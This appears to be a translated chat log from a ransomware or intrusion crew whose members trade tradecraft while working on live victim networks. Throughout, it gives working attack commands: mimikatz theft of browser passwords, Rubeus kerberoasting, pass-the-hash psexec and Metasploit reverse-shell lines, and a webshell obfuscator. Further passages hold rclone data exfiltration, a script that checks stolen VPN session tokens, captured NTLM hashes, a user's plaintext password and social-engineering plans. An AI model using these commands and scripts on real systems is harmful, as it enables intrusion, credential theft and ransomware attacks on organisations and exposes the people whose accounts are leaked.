Please share your experiences who worked with Exploit EternalBlue in MSF ...? Whose? I understand, thanksgreatest thing is that 90% of the time 1 naprol to everything) also in the software can be IT folder with passwords, but also they can be passwords in excels found on the desktop and in the docks, called passwords) Once these same excels found in van drive authorized in the mail bodyHi all. Podskazh please, where can I find the Credits from Datto? Viam, orbs, cypress, chrome is understandable. Any other options, where they are most often stored? Maybe some way out of the clients can?[ ](https://stylebrooks.com/group/general?msg=ynnSjY62yQAhZMDoG) cps, added to the notes `execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\programdata\ guys can I add to the confab about tool chain? you shoot sharphound, you drop it into bloodhound -profite in two words who can explain how bloodhound start using?[ ](https://stylebrooks.com/group/general?msg=TXftyYQdkvMqd6B9X) resolved through the replacement
wusa.exe
to
rundll32.exe[ ](https://stylebrooks.com/group/general?msg=4SXBDzeGnxSzwguH4) do you need to connect as local admin? or enable local admin service?
jhmW6WXkvsAwheK2P5XiR8Cm7k6dYgnFAcD8y6ONiZBZbEQIUFk1gVjdnpSwqHDq
```
look whoseHello, everyone.
If anyone has run CVE-2021-21985 for vCenter, PM me please.Greetings all, question to the knowledgeable, when backing up a skul base
sqlcmd -E -S localhost -Q "BACKUP DATABASE databename TO DISK='d:\adw.bak'"
If the base is a pass, then in the backup will also be a pass, can you remove it (pass) during the dump or what else to get the output backup has no pass? Got it, thanksBut still, if the question is about speed, the method can be easier to take. How else can I do it if there is a large attachment and the number of files? I divide into portions of the archive that would be easier to download by 8gb7ziptopodskip, do you archive files before uploading or take away as is? if so, what is the speed?
IP Address: 23[.]82[.]128[.]116
Domain Name: secost[.]com

Whose? I need to check one@all who has a session on the cob from a user's machine with system rights and an authorized user - please write to pm and give me access to this cobaPerformance of this should not depend on which av. if evil, they may swear, won't they? ``mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

button in the context menu, runs on all selected, the output is crooked, but it's the wind, no time to mock further, the script itself removes after itselfmasonDoes anyone know how to check whether tapes are connected in veritas backup exec?
I can't use library, says it does not support it on the forum please obfuscatorFor those who have asp webshell is deleted by aver! you can obfuscate not only the one in the archive, it removes the detects
link:
```
https://github.com/grCod/poly
```
-
command example:
```
poly.py -c aspx -e rnd -p shells/shell.aspx [-j]
```
parameters:
```
'-c', = 'Shell code. [ php, asp, aspx ]''
'-e', = 'Encoding method. [ b64, ord, rnd, rot ]''
'-p', = 'Path to shell.'
'-j', = 'Add junk code.', action = 'store_true'
``Yes, 100k hashes, I use ntds hashes for brute-force cdbx\archives/extracell - best[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=o3pBToWQ5KsWzu2fF) What's a top subscription? Brute-force ntlm and kerberos[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=bfiBdmKfuyTcw4k3S) first thing I check on cmd5.org
I give to the section paid hash hacking on eksp, but you can go directly to the two guys who most decrypted me, it is:
```
https://forum.exploit.in/profile/85027-amiga/
https://forum.exploit.in/profile/46932-sc0rpi0/
```
They should be able to help in any case, thanks, I will keep in mind a well, 100k hashes. how's everybody for a top subscription ?
I also have an account, there seems to be a lot of wood, should be enough for a long timedunkshesk also monthly subscription, who wants - please @brandon cmd5.org has an account, who need it - welcome, top subscribeDemand if we collect the top 10-20 links, then create a branch here and collect a total stat - the leaders will be revealed fairly quickly and everyone will have access to itfor quality decrypt - to be honest, I'm not thrilled, but, I used it a little, the feeling that cmd5 works better, but there is a bulk fit and it is free, but there is captcha peskyhttp://crackstation.net/do more services
It's a common fucking problem, let's solve it :) in cmd5 you can get a bunch of hashes through a page with 200 hashes and a lot of hashes through windows binary.
ntlm hashes can't be done with topchicopt, but it's like there's only one hash at a timecmd5.org seems to work fine@all who decrypts hashes?
There are a couple of people, but maybe synchronize all the contacts, services, farms to make it all run more efficiently?
The idea is to give a dozen hashes to online services and see the output, where brute force - then the service really steals, similar to the bruter from the different forums
We could compile 10 services, then make up the top 3 and work with them constantly
I made a mistake with the chat. Sorry. 10.200.0.4
10.200.0.5
10.200.0.8
10.200.0.9
192.168.170.250
192.168.170.251
192.168.170.252
192.168.170.253
192.168.136.56
192.168.136.137
192.168.139.153
192.168.254.52
192.168.255.52
192.168.254.76
192.168.255.76
192.168.254.53
192.168.255.53
192.168.254.74
192.168.255.74
192.168.254.54
192.168.255.54
192.168.254.55
192.168.255.55
192.168.254.72
192.168.254.71
192.168.255.71
192.168.254.68
192.168.255.68
10.20.6.63
192.168.136.6
192.168.136.5
10.20.6.26
192.168.136.29
192.168.136.151
192.168.170.249
10.20.6.42
192.168.136.100
10.20.6.201 ``@all in which congress the locker is missing tell me
i lost some one where the software should be put who dealt with it that would not fade RDP when inactive what settings should be done? that too bad, the pass in the clear will lie near) googled on the subject, like they say you can create in a folder with pklon .ini file and set SET RCLONE_CONFIG_PASS = хххххххххххххххххх without entering it into the consoleThe question is how to pass the parameter with the password at startup, from the cobbs, say\[ ](https://stylebrooks.com/group/general?msg=uNucyKgWbHMYkgvsC) the conf file is better to put somewhere in one place and all exe specify in the command where to take it from, like this `copy --config C:\programdata\Oracle\Java\.oracle_jre_usage\rc.conf "\\192.168.1.13\H$\Backup\Data\000\000\0\0\17" options:.....` since it's not easy to collect conf files later, and there you can tell the information in the palm of your hand...and then the megs will crash often that would be more fun with the encryption would be to rewrite it) reliably:joy:I will give you by64 encryption if memory does not changeconfig you create and forwardxxz, the default password is encrypted, about the soap, you still the file rclone.conf file and put it next to the ecz, then delete it as you downloaded everything, about the background, I do not know, I use rdp to start and kmd is spinning - I do NOT logoff - just turn off, if you want to logoff - need to run from the system as a service, and the system is not available from the ball, but if you have them primaunched, but this is also an extra finger done, you can encrypt the account and password, but it is entered only with gui, and without gui, such as coba to do it?how can you run it from the system, and logoff the user that it would applaud in the background who uses rclone for upload?[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=e6eJ25taoi6Fe3bMX) yes, that way and solved the problem ....) if you look through AIP there in the hostnames you can look for DCusually the first dns is always dkipconfig /all dk is usually a dns serveraga[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=8oG8jzK5tD2WuqcHs) do you have both netextender and smac client installed? both?[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=MYsCigPb35ihL2Adu) i don't know dk aiP, so i asked for sabinetikh) i hardly shut it down recently, no disconnect, button is not active, reboot does not help I had a hard time disconnecting it, it wouldn't work when I restarted my computer, I had no rights to fuck it up, I stalled my processes and the service brought them back up. I had to uninstall it and it would connect to the network by itself) it's a glitch, sonic maybe somebody met that, when I connect to a client with a sonic vpn, EPC agent pumps and then opswat override. As finished any creed knocks out EPC Check fail.See log for more detailsaddfind -h 10.200.58.11 -u jacquetmetal-sb\tomasetr -up willi2712 -f "(objectcategory=person)" > ad_person.txt like this from the usercrede can collect without problems 16 subnet simply will scan forever why bad collects? they are either set by the admin or not, no?no no, you need exactly the gathering of subnets WITHOUT the adfind, when only the ipn is and the user's credentials, more nihuadfind kalovo collects, I like to do so, we parse all the hostnames from ad_computer's then ping them with pinginfview, arrange the output by ipi addresses, then just parse all the subnets from there /24@all please share the script for gathering subnets without adfind =)thank you```.
psinject 000 x64 Invoke-ShareFinderThreaded (-CheckAdmin Admin Balls) -NoPing (-MaxThreads 4 number of threads)
argument, I'll send you @Code can you modify the script so that the number of threads is given as an argument? so look at the thread count depending on the patientThe optimal number of threads for bulk queries in general is
10-15 - lowsec
8 - midsec
4 - highsec you can adjust number of threads, 10 is good by default[ ](https://stylebrooks.com/group/general?msg=hARNSxBzn4gfD2R3f) wow, that's pretty cool about multithreading try to put it on dinchek without arguments, but i don't know what it will show you, dinchek can only run the build with regsvr, you should run it with radll[ ](https://stylebrooks.com/group/general?msg=pxXX4YjQaHh298T8ds) get a monthly subscription, there in the scan options you can specify an entry point for the dll, after you upload it thereI mean the locker.[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=pxX4YjQaHh298T8ds) Good morning! I think in cobalt_v42_patched wrote that with the function DllInstallGood morning, everyone!
Can you please tell me how to properly check the DLL of the build on the dincheck?
Is it necessary to specify some kind of input function? obfuscator of webshells, I have not tried it, but guys from ekspa say it helped to avoid detects, if it works let me know
```
https://github.com/grCod/poly
Guys, when connecting via an ndp via ngrock backdoor, displays an error (after the request creeds) may be useful to someone - looked script ShareFinder recently, there is a multi-threaded scan with the output in the console only the ball, where you can get and get all the computers in the network, which incidentally works better than net view, which sometimes dumps + search all mssql bases in the network (not in the balls)
```
powershell-import ../ShareFinder.ps1
psinject 000 x64 Invoke-ShareFinderThreaded -CheckAdmin -NoPing
psinject 000 x64 Get-NetComputers (-SPN mssql* find all mssql databases on the network)
``[ ](https://stylebrooks.com/group/general?msg=S8xDjNpZfL7xambxD) 192.168.17.0/24 tell me and try to get into the neighboring ones. It's not like it opened normally in myexec just pseudo-admin rights, you can't do it without rights[ ](https://stylebrooks.com/group/general?msg=NHenn8A3SoicnprGj) the same thing with wmiexec I tried it too `or climb the rdp through the hash `t !! but for this you need to bang this `reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f ` but it too needs 445, for authorizationwmiexec.py powera although fuck you have no admin rights, you can not get into or climb over the rdp through the hash then look for another server where 445 to 17.250 will be available but session does not comeintinet is and the domain is even pingedinet no? if you run kmd you run and randll32 not up and that's the point so pick up the session there `netstat from the host where you have a session hangs? no, netstat unchecked 192.168.17.250 there is access by redneck user `admin-nono` (visible above) but the user has no rights there can not let them in if I understand correctly how it should work to your mind?)and 192.168.17.250 and the host where your session is not the same host correctly understood that you checked the 445 port to 192.168.17.250 took netstat from the host where your session hangs?[ ](https://stylebrooks.com/group/general?msg=7taaTE5323nMtEZZt) and how it is closed if :
`TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 ` that's the problem, we can not raise the session as one of the options If you can get in by RDP - get in and raise there session
port number -Pn -O -v -p 445 192.168.17.250
ProxyChains-3.1 (http://proxychains.sf.net)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 20:57 MSK
Initiating Parallel DNS resolution of 1 host. at 20:57
Completed Parallel DNS resolution of 1 host. at 20:57, 0.00s elapsed
Initiating SYN Stealth Scan at 20:57
Scanning 192.168.17.250 [1 port].
Completed SYN Stealth Scan at 20:57, 2.04s elapsed (1 total ports)
Initiating OS detection (try #1) against 192.168.17.250
Retrying OS detection (try #2) against 192.168.17.250
Nmap scan report for 192.168.17.250
Host is up.

PORT STATE SERVICE
445/tcp filtered microsoft-ds
Too many fingerprints match this host to give specific OS details

Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
           Raw packets sent: 50 (6.760KB) | Rcvd: 45 (7.334KB) So you should check smb instead of ping
the netstat you took off - it's not from the remote host? in general, from the host where you have juxtaposed all pings From the host where you have juxtaposed I can use rdp to connect but the user is not interested in it has two rights there sneezes or the host is not available from the host where you have juxtaposed vicitpespes filtered at the network level
who uses the impacket?
what could be the problem?
```
proxychains ./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:11ce1cfb0c1e884386990eb5650f3cf6 Administrateur@192.168.17.250
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

|S-chain|-<>-209.222.98.79:48-<><>-192.168.17.250:445-<--timeout
[-] [Errno Connection error (192.168.17.250:445)] [Errno 111] Connection refused
```
port is open on the host
```
:\Users\admin-nono>netstat -ano

Connexions actives

  Proto Adresse locale Adresse distante État
  TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756
  TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:3389 0``

``open aha if port 135 is open - put the token through the mimic in memory and get into the mikechek ports open or the Windows hangs, if node would block it would immediately write an error but it hangs long node blocks the reason? port is closed or what? I say the psec does not work heresmb/psexec ``
/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=443 RHOST=192.168.1.20 SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E
``impacket wmiexec google[ ](https://stylebrooks.com/group/general?msg=GAhKvYbMXMaqfZs9m) well fuck me)from my virtual machine tried to put on mimic, but when you log on psec the session hangs and hangs and hangs just mfc or ermiexec the cob, work without it and in ermiexec the cob?
```
pth [DOMAIN\user] [ntlm hash]
``no, what is this tried? trabh, nss have local admins, but no domain admins
where these locals go, no admins go, there's a servak, there are domainadmins hanging there, but there local admin we have only hash, and it doesn't open by hash session, hangs and hangs for a long time
but it's possible to get in there not as a local admin
on the rdp.
there may be a way to have a legitimate hash admin? no rights to sue the lsas
the network is working network nod32da if 2fa is worth it can fly at once manymozhet I'm wrong, sonic logs do not knowno generally I threw - but it sticks, on this token and try to come in check the username and password are? if someone has suggestions for automation - write too, I smell in my spare timeperepeylaet under everything, someone somehow write back later how it worked in ls[ ](https://stylebrooks.com/group/general?msg=Xwwwgu3QA3CjcqtD7N) zvhhitech[ ](https://stylebrooks.com/group/general?msg=mhHvkTKNqMMgCDGpW) ad_users >objectSid:hello all. where in ad info writes the domain seat for golden ticket? guys who worked with ovh.com; export the box or migrate history to another server interested in on the wine will - I will knock down eh ``
./check-sonik [site.com] [path to sessions.json]

at the end will output sessions with cookie tokens ready, no need to do btoa, here's an example:
User: jasmijn.maertens Password: Jmij310s455172 B64 token:MXJ4UHpXSXRGVVUxrRFV5a2U1aU1GRnNXZG5FZEVCSkVNMNMldJU3dWM2I4QT0=We do a kerberoasting attack via VPN from a NOT domain machine, having VPN cres
```
kerberoast remote from non-domain machine with domain user creds:
1. Rubeus.exe kerberoast /dc:wesads15.wes.local /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt /creduser:domain.local\username /credpassword:UserPass!

Asreproast remote from non-domain machine with domain user creds:
2. Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt /dc:dc.domain.local /creduser:domain.local\username /credpassword:UserPass!
```
As you can see we are doing the same as in the usual attack, we just add 3 new attributes:
/dc: - specify the domain controller
/creduser: - username of the domain user we are launching from
domain user login and password from which we start /credpassword: - password of the domain user from which we start - I will just do it once, why don't you add the build with examples of startup?
import os
import sys
import requests
import json
import time
import threading
import base64

main_url = sys.argv[1]
file_uri = sys.argv[2]

print('Site: ' + main_url)

def checkToken(token, user, password, domain):
    global listOfUsers

    base64_token = base64.b64encode(token.encode("utf-8")).decode("utf-8")

    portal_url = 'https://' + main_url + '/cgi-bin/portal'

    headersData = {
        'Cookie' : 'swap=' + base64_token + '; SessURL=https%3A%2F%2F' + main_url + '%2Fcgi-bin%2Fwelcome',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0',
        'Content-type': 'application/json',
        'Origin': 'Origin: https://' + main_url,
        'Referer': 'https://' + main_url + '/cgi-bin/welcome',
        'Accept-encoding': 'gzip, deflate, br',
        'Accept-language': 'en-US,en;q=0.5'.
    }

    print('Check user: ' + user)

    x = requests.get(portal_url, headers = headersData, verify = False)

    if x.status_code == 200:
        if(x.text == '<HTML><HEAD><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><meta http-equiv="refresh" content="0; URL=/cgi-bin/welcome"></HEAD><BODY></BODY></HTML>')
            print ('Bad')
        else:
            listOfUsers += 'User: ' + user + ' Password: ' + password + ' B64 token:' + base64_token + '\n'
            print ('Good :' + user)

json_array = json.loads(open(file_uri).read())

thread_list = []
listOfUsers = ''

i = 0
for item in json_array:
    i += 1
    item = item.split(' ')

    thread = threading.Thread(target=checkToken, args=(item[0], item[2], item[3], item[4])
    thread.start()
    thread_list.append(thread)
    if i % 10 == 0:
        time.sleep(5)

[thread.join() for thread in thread_list]

print('\n\n\n\n\n' + listOfUsers)[ ](https://stylebrooks.com/group/general?msg=NpJTET9Nc2hDto4np) scan the subs, see what services are running
you can macro-assemble the dossier from username to username.
mail carefully on your free head you can readSoon we'll hire droops, they would organize ventry points in the office)))) if there is no choice, why not)maybe see who is an IT designer how to write, create a domain similar and write in his style
but it is not worth it probably - there was a mail to the IT director
from him wrote to some lady who was scanned by public companies that she is 30-40 years old
asked to set up a timeweaver id pass
went in, started palaud
email in the spam filter put and monitored but palsy at some point[ ](https://stylebrooks.com/group/general?msg=oZdH9QkFppTXLeHfj) Are there any other possible options for this problem?) I tried to connect to the mail, some mails do not fit creeds, and where they fit 2fa on the phone is, rdp added, but do not connect, even I do not know what else to try[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=HSNtHKeYMXQB4JPDX) found the input mail, but alas do not fit creeds (` `)
Unable to verify client certificate

```
sonicwall
i have a problem with it? @Bug let's give it to me and there should be ok everything) will try to reinstall it, strange behaviorvirtualkahttp://imgur.com/KxqQ8yh.png are you on the deck or on a computer?and the disconnect did not make a pidpeck, i did reboot the pc, i turn on and there HE, running with the account network i got hooked up, i must be bustedda wanted without a reboot disconnect from the autorun and reboot?well everything turns out, the network has absorbed you, you're part of the network, the fuck you disconnect) it again raises the processtupo not stop services, processes kill, and the service does not give a fuckta i told you, the button disconnect is not active[ ](https://stylebrooks.com/group/general?msg=iPHM9hgzYmF43NgXR) does not allow the system to cut it too, and the tin or reinstall or reopen the process then I do not know)) the system processes it enabled because no access and app blahwhy?i can't disconnect it from the user or is it a system csmd need to kill the process how to close the fucking sonicqual extender? no disconnect button, it is inactive, the ecite does not come out, but hides the current, then i turn it on and it works again, processes from the system, the user can not exit, what the fuck) bingo
try to get into the mail with the same cres[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=7XYNhwfT48wEpBBia) aha specified their domain sabysdomain.com - their domain? ah, they have this: A temporary password has been sent to your domain.com address. Please enter it below.
is not explicitly stated that the mail, just the domain address, but in theory should the mail?) 2fa code sometimes arrives at the post office
subdomain with mail find and take out from there the code and all ok
it works if it arrives at the mailThrough the email to the connection to the VPN? Or try to read the soap as described: "take off the subdomains of the external domain and try to find the mail "through the soap nest tried through the soap? 2phapo vpnu no connection ?[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=wG38vpxeqC42uny6x) yes it seems local) they are lit, 192.9.201.50 192.9.201.93 192.9.203.110 tried and .local and .com does not help, and there if rdp worked, I think any domain could write it would give out that the creed is incorrect, but here is just no connection to rdp Tugrebyat, tell me how eset file security quits?dcsync is a fucked up way to go either way) and sofos is storing the winndogs? it's like just against malware? how quiet is it to do dcsync on specific users with sofos on dk? yeah, thanks a sec, i'll try it now@Andy also can remove subdomains and see some Citrix / RDWeb / guys, salaam
Does anyone have a poc CVE-2019-0543
can't find it on google, try to read my mail
remove subdomains external domain and try to find the mail that you have such an ipak 192 9 201 93 ? it's external and will be clinging to the DC on the ideadomain.comdomain.мocaelpoprobyyt indicatebyl together with a sonic in the file, already and random ran them) can RDP closed, where do Ipas take? who facedrandom overran already ips RDP, not one does not connectPriestu all! Tell me about Sonic, in the web when you come in no rdp, I create a bookmarkVapo I had such a thing, I created a virtual and it raised without problemsDa, can die, but better check.nah, there token after a while only can, then all? Through the session tried? As I think the credential initially we have the correct, but there is a limitation to connect, no one encountered?Trouble is, there is a sonicwall to it 6 Credits, when you connect to webmorda long processing is (a couple of minutes) and the result gives out that the creed incorrect, and if you specify the same login but change the pass to at least 1 character will issue that the wrong creed almost immediately without waiting a few minutes. :)2ya understand the inventory and disk, disk (2) on the logging of things to press?)) to remove the replica reliably from the center, which of the buttons to press?
1. Control Panel -> Internet Options -> Advanced (tab) -> Security ->
mark only "Use TLS 1.1" y "Use TLS 1.2

2. Control Panel -> Internet Options -> Security (tab) -> Trusted Sites -> Sites
put "add this website to the zone:" https://url_ip_site_gateway
```
the problem is that he netifikat generate ssl 3 and all will go in the settings of the Internet explorer ssl need to put if we solve the problem - will tell you how to solve it does not help) yes, I have this often, i got the error code -7200 when i connect from the nix client, openfortivpn is ok, but i can't connect from the windows, what's the problem?has anyone caught error -7200 on fortivpn with valid credentials? how to check whether the entripoint is "standard" - run it via randl32 without the argument of entripoint, if it starts, it will not go through StartW
you need a dll with a standard entripoint, like EntryPoint
so the print spooler can load the dll as a driver at allbo only fixed the error that now everything ok writeshttp://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html did for this manu as an option here offered to bring down the dll with the command to add local admin but I have not yet normally tested but in my case StandWhich does not matter should come session with elevated privileges entry point in the dll what should be `` ``.
lpe_cve_2021_1675
and in Beconedell should be called lsass.dll on Target, put your dll on the path C:\Users\Publishwith koba please send files and How did you do it) thanks a lot. now says 0 and everything is done and working) yes thanks) File Not Found turns out error - it's a Windows error, google the list of standard vin error codes and try to guess what he does not likelpe I have not tried, only pseepriyutsya to the question, where not tested all of the type is complete and two errors do not know what and nothing in fact failedgod post in the PM who managed to successfully perform an attack ` CVE-2021-1675 / CVE-2021-34527 ` PrintNightmare. Need tips tips ... tell me how to move the crosses under which dumped - logged in skul databases, this crosses dada long did not get caught skul base, and then I had to dump them and here's the shit came out guys hello ``Message 976, Level 14, Status 1, TransSQL1 Server, Line 25
The destination database, 'Bol', participates in a group of availability and is not accessible at this time for consultations. The data movement has been suspended or the availability replica is not enabled for reading access. To allow read-only access to this and other availability group databases, enable read access in one or more group secondary availability replicas. For more information, see the Alter Availability Group instruction on the SQL Server on-screen books.
Anybody got a cob with clean payloads? A pre-built exploit for a remote code execution vulnerability in VMware vCenter ( CVE-2021-22005 ) is now widely available, and cybercriminals are taking advantage of it.

Unlike the version posted on the Internet at the end of last week, the new version of the exploit can be used to open a reverse shell on a vulnerable system, allowing the remote execution of arbitrary code.
``Session after the jump, the process he created under which process was the session?
there were nasa and netapp feeds from three different servers, one didn't have av, two had av?
i meant that after the local drives it goes to the network, but it just shut them off, not even sure if it's a bug, just a "nuance" injection locker through a session on the server for some fuckin' reason shut down all the drives primaunched
the mount was via token
why this happened dz@all have any actual list of crypto URLs (exchanges, web wallets, etc.) atomhashersarmpiperperry have any free harddisk with patty on board?I'll send it to decrypt it. I'll try to decrypt it first thing. Can I try to decrypt it first thing?
[*] Started service listener on 173.232.146.32:445
[*] Server started.
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:df4cc93564883530f00c92be1333edfc
NT_CLIENT_CHALLENGE:01010000000000002c4b97d25085d601a70b92049be339e400000000020000000000000000000000
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:c5afc76c2d09ad6c7ce13f420b2ec61a
NT_CLIENT_CHALLENGE:01010000000000003264c3d25085d6019ce5ca50c8b5de4400000000020000000000000000000000
[*] SMB Captured - 2020-09-07 19:55:23 +0000
NTLMv2 Response Captured from 98.191.94.98:62397 - 98.191.94.98
USER:scans DOMAIN:TRIDENT OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:fd5be12ff64b685d4aa74e26ad3947b1
NT_CLIENT_CHALLENGE:0101000000000000893ed5d25085d601f1f9d3719c7319f700000000020000000000000000000000
What's the answer in the log? I don't know what's in the log. it's a little fucked up. it's complicated. but it's broken) I see the answer. now there's something in the log? so I tried to autorize it. beacon> shell dir \173.232.146.32\aksdjaklsdj
[*] Tasked beacon to run: dir \173.232.146.32\aksdjaklsdj
[+] host called home, sent: 63 bytes
[+] received output:
The user name or password is incorrect.
``Now I checked and went on and when I specified the ip first not off) I first ip did not specify and the server startedmozhet you have not rootlog plza ok then I will look at what's upokoba not take 445445 port (fuck and I have a koba and msf near the smb policy allows you to do so. just generate and spread it out in a balloon of 10-15)and if hash comes again do a shell dir \\\YOU_IP_WITH_MSF\aqqdj up this module near me)msf at hand? On the responder start the listener quickly)https://habr.com/en/company/pentestit/blog/337390/секага happy se``beacon> shell dir \\\172.93.110.126\c$
[*] Tasked beacon to run: dir \\\172.93.110.126\c$
[+] host called home, sent: 54 bytes
[+] received output:
The network path was not found.
``Here and output do simplyIp specify the session? Output what? shell dir \\172.93.110.126\c$ how to throw the shortcut?) do so then in decrypto at the necessary networks will come hash network and if the person in you through esplorer this open the balloon you throw a shortcut will not need it to catch the user right?although you can throw the shortcuts, but it's also a variant so-so.... yes, I've tried everything on it, but there is a question of implementation and experience to practice honestly? not worth it pomoymuyuhuyu turn around) 60 machines4 serva12kka revyewhat with this? ugh) 1. smoke lepE
2. look towards the web - run akunetix with socket in the local area and upload
3. Raise permissions via MsSQL from two machinesSeChangeNotifyPrivilegeSeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilegegetprivs not admin ..beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are TRIDENT\since exactly getuid? polozak(yuak no problem to bypass via sstask inside the localhost like if you have an adminkanet tried to decode in bace command that would bypassgetuid works UAK forgot to specify only from polozakanetThe server got there - you have the rights of the system? Balls don't lead anywhere, there's nothing interesting about them. There were 52 passes pulled from the browser. I ran a SMB login and found 4 passes from 4 accounts. Out of them 1 account more or less, which only fit the server from which I also tried to collect everything. Kerb is not removed. In the group is empty. Vulnerable to MS17, what to add polzak, - no. Stas does not work) Standard boosts (elevate, too). Also tried brute-force passes - fuck. No restrictions on the number of attempts. what do you advise? -I'll write now to the group with the network, so as not to rubbish here Tell me what you're going to brute force there send me to the network I'll get so fucked if there are a lot of users, ie, I specify a specific user and a file with a pool of passwords, right? by pass brute force userUSERPASS_FILE and I have a pool of accounts and a pool of passwords and fuck knows what password to which account comes up da
and if hash
user LMhash:NTLMhash etc. So, the userpass file, as I understand it, contains a username and its password, and it's in one line:
Vasya 123here it was turned the script is better not smb loginYes, it is always best to use USERPASS_FILE :)
And then the smb smart brute-force in generalThe people, information for reference:
did brutforce in msf through smb login, did with a pool of passwords and logins, ie, among other settings pointed to two files - one with logins, the other with passwords
it turns out that you can not do so, because it is unnecessary alertsThank you 1jobsAnd how do I stop the coba ? https://github.com/tevora-threat/PowerView3-Aggressor
Might come in handy for someone.Yeah, interestingHaven't checked it out, but it's an interesting topic.https://github.com/gloxec/CrossC2:handshake: goodnight:hand_splayed:see you all tomorrowBefore all. See you all tomorrow. Waiting for 15 human factor will always remain on the vectors I gave a very small base))))@steven it is already lpe they did not show it)okn tomorrow)@alex bring a specific case for discussion, describe in detail what you did, what did not work with what rights and so on, which give the substitute dl can see the services of the other how to go from this machine without a license is the only way?to polzak and everything you take off in the pid jumpa i realized that in the msf is how to do it right i showed you i mean balls are not taken off what to do with them in general the nets cause no session from polzak nothing ball is taken off friends, i plan to leave soon for today, Please tell me your impressions, problems you see, ideas to discusscompetence * I do not have enough for myself to do a normal manual, here's razetki fucking great even a child would understand the zone of responsibility teamleaders include:
1. Giving out cases for work
2. Teach, advise, instruct.
3. Connect in the process of solving atypical or unprecedented tasks
4. Help with builds of loads, fixing in the network and other technical questions concerning the software.
5. Provide the necessary guides and manuals.
Guys can give more cases according to point 1. ? manuals, etc. really would like to do by example, or at least look at google razetka) banal carelessness admins are written in the comments kredyno human factor will always) =) Michael, you pomoymu already have a problem, huh? =0 With each year the nuts are tightened Alter you as a seasoned wolf, tell me every year it becomes more difficult to pick up? or is it a myth?i have no problem with gladly listen to all the ideas / suggestions etc. at the end of the day i have a small meeting for this channel, in an hour here - discuss all the ideas / questions / problems))) ok) maybe something useful will pop up, i just throw out some ideas, generating michael, you can download a broken web scanner, run via sockets and pinged on the local ipaks. all eh. where easier? who are you going to hire? = ))) i did it today, one command worked if you don't understand it, don't bother.
why spend thousands of hours if there's a ready-made one? that's why small grids are given to beginners in the beginning. even the word hello is a template michael, you just need to get into one area and work it out. you've been told on the web what's making your brain melt, exploits are effective but you need to work in one direction and then switch to another... well, how the fuck does it work? the "topchik" doesn't fuck with skeletons and instructions) it's just fun to finish a web to the end. it's like with the chick, it's interesting to fuck up the topchikToday it was only a ruler, what's there to strain that.afk 10 minibat my brain melts men since school did not strain so )just so coincidentallymichael, you just have a couple of grids so far have fallen. no big deal =)well it is also logically clear, no need to make noise in a bunch of streams, no need to generate dirty loads. i did not know that i think the beginners here also did not know it all and movebase they give you in large networks automatically alerts and within an hour they cut out or else decide my friend not a skeleton but a template in small networks do not follow itwhat other skeleton do you want to see? in a normal network you'll get kicked out fast and it's just as logical, no need to make noise in a bunch of threads, no need to generate dirty loads, you need a dll which should be checked once in 2 days for randomness on the target AV anyway there is a general "instruction" - you just need experience...large may be we make a general instruction on what you can and can not do with large networks?everything comes with experience but i already understood that in my case, i can't do fat networks with one person, i can reduce the load on the network, is there a logic in it?rattling too long , it's clear the fucking hand is not shaking yet)) and what did you do before this who have any thoughts so they will not betray us ...rap )guys already second fat network blitzing dostNew school is lilkristall , ogbudda :smile:new school rules )havan:joy:rapday in an hour we will return to it huh?  )rock or rap ?I suggest everyone to discuss a serious question in case you haven't seen ?Start a binary on a remote machine through SCHTASKS from Cobalt Strike

We put it on the

    \remote-hostname123\c$\Programdata\srvvhost.exe

